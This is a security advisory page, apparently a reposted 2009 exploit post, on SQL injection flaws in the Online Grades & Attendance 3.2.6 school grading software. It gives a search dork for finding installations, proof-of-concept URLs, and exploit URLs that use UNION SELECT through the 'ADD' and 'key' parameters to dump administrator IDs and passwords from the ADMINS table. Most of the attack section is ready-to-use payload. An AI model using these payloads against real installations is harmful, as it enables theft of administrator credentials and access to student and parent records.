Online Grades & Attendance v-3.2.6 - Multiple sql injections

2009.07.28
Credit: y3nh4ck3r
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 6.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

----- MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 --> ------- CMS INFORMATION: -->WEB: http://www.onlinegrades.org/ -->DOWNLOAD: http://www.onlinegrades.org/ -->DEMO: http://www.onlinegrades.org/demo_info -->CATEGORY: CMS / Education -->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same features plus many new features. OG is a web based grade... -->RELEASED: 2009-02-05 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "Powered by Online Grades" -->CATEGORY: SQL INJECTION -->AFFECT VERSION: <= 3.2.6 -->Discovered Bug date: 2009-05-21 -->Reported Bug date: 2009-05-21 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### ------------------- PROOFS OF CONCEPT: ------------------- <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> <<<<---------++++++++ Condition: Be a registered user: Parent, Student or faculty ++++++++++--------->>>> [++] GET var --> 'ADD' [++] File vuln --> 'parents.php' ~~~~~> http://[HOST]/[PATH]/parents/parents.php?func=mailto&ADD=-1%27+UNION+ALL +SELECT+user()%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++] GET var --> 'key' [++] File vuln --> 'index.php' ~~~~~> http://[HOST]/[PATH]/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,vers ion(),3,4,5,6,7,8,9,10,11%23 [++[Return]++] ~~~~~> user or version in DB. ---------- EXPLOITS: ---------- ~~~~~> http://[HOST]/[PATH]/parents/parents.php?func=mailto&ADD=-1%27+UNION+ALL +SELECT+concat(client_id,0x3A3A3A,client_pw)+FROM+ADMINS+WHERE+id=%271 ~~~~~> http://[HOST]/[PATH]/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,conc at(client_id,0x3A3A3A,client_pw),3,4,5,6,7,8,9,10,11+FROM+ADMINS+WHERE+i d=1%23 [++[Return]++] ~~~~~> client_id:::client_pw in 'ADMINS' table #### #### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## #w#-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ###

Referencje:

http://www.securityfocus.com/archive/1/archive/1/503943/100/0/threaded
http://www.milw0rm.com/exploits/8844
http://secunia.com/advisories/35304


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top